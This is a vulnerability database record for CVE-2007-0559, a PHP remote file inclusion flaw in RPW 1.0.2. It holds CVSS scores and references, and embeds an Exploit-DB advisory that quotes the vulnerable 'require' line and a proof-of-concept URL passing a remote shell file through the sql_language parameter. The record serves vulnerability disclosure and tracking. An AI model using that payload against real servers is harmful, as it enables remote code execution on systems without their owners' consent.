ID CVE-2007-0559
Type cve
Reporter cve@mitre.org
Modified 2017-10-19T01:30:00
Description
PHP remote file inclusion vulnerability in config.php in RPW 1.0.2 allows remote attackers to execute arbitrary PHP code via a URL in the sql_language parameter.
{"id": "CVE-2007-0559", "bulletinFamily": "NVD", "title": "CVE-2007-0559", "description": "PHP remote file inclusion vulnerability in config.php in RPW 1.0.2 allows remote attackers to execute arbitrary PHP code via a URL in the sql_language parameter.", "published": "2007-01-30T16:28:00", "modified": "2017-10-19T01:30:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0559", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/3185", "http://www.vupen.com/english/advisories/2007/0342", "http://osvdb.org/36626"], "cvelist": ["CVE-2007-0559"], "type": "cve", "lastseen": "2019-05-29T18:08:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d977e8864e43473f04f179150580ff6b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41bd12e5962a05ee9f75fcf21ff72e7"}, {"key": "cpe23", "hash": "5eae7e2aae17a8621ddb517c5fa47880"}, {"key": "cvelist", "hash": "3d55ad53d9bb7caa1fcc1b5978efb648"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "9d61c8bc00f4484101603885f1f020a4"}, {"key": "href", "hash": "ca24718582edc6135041cfb63f165753"}, {"key": "modified", "hash": "a1f0c94bb8f8dd6383da314821bafce9"}, {"key": "published", "hash": "25da390afc96ba0a8d3b8dfa0c2f3835"}, {"key": "references", "hash": "08600f6ccbe26a3c7128a3a4539478a0"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "35c1f65fe3ddf4298f9b6d9db4d2b4ef"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "95330c3ebf0990ac5a3d84bc44137308a33c495baa04af75e3854c9589b84cf2", "viewCount": 0, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:08:58"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:36626"]}, {"type": "exploitdb", "idList": ["EDB-ID:3185"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7090"]}], "modified": "2019-05-29T18:08:58"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "cpe": ["cpe:/a:rp_world:rp_world:1.0.2"], "affectedSoftware": [{"name": "rp_world rp_world", "operator": "eq", "version": "1.0.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:rp_world:rp_world:1.0.2:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T17:55:21", "bulletinFamily": "exploit", "description": "RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability. CVE-2007-0559. Webapps exploit for php platform", "modified": "2007-01-24T00:00:00", "published": "2007-01-24T00:00:00", "id": "EDB-ID:3185", "href": "https://www.exploit-db.com/exploits/3185/", "type": "exploitdb", "title": "RPW 1.0.2 config.php sql_language Remote File Inclusion Vulnerability", "sourceData": " _________________________________\n ________| |________\n \\ | Dr Max Virus | /\n \\ | | /\n / |_________________________________| \\\n /___________) (___________\\\n------------------------------------------------------------------------------------------------------------------------\nScript:RPW\nAffected Version:1.0.2\nDownlaoad&Victim:http://vlad.tepesch.free.fr/mods/rpw1.0.2.zip\n------------------------------------------------------------------------------------------------------------------------\nAuthor:Dr Max Virus\n------------------------------------------------------------------------------------------------------------------------\nBug in (config.php)\nVul Code;\nrequire($sql_language);\n------------------------------------------------------------------------------------------------------------------------\nPOC:\nhttp://[target]/[path]/config.php?sql_language=shell.txt?&cmd=0wn3d By Dr \nMax Virus;\n------------------------------------------------------------------------------------------------------------------------\nThx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends\nSpecial Greetz:AsianEagle-TheMaster-Kacper-Hotturk\n------------------------------------------------------------------------------------------------------------------------\n\n# milw0rm.com [2007-01-24]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3185/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/config.php?sql_language=shell.txt?&cmd=0wn3d By Dr\n## References:\nGeneric Exploit URL: http://milw0rm.com/exploits/3185\nFrSIRT Advisory: ADV-2007-0342\n[CVE-2007-0559](https://vulners.com/cve/CVE-2007-0559)\n", "modified": "2007-01-24T00:00:00", "published": "2007-01-24T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36626", "id": "OSVDB:36626", "title": "RPW config.php sql_language Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-01-24T00:00:00", "published": "2007-01-24T00:00:00", "id": "SECURITYVULNS:VULN:7090", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7090", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}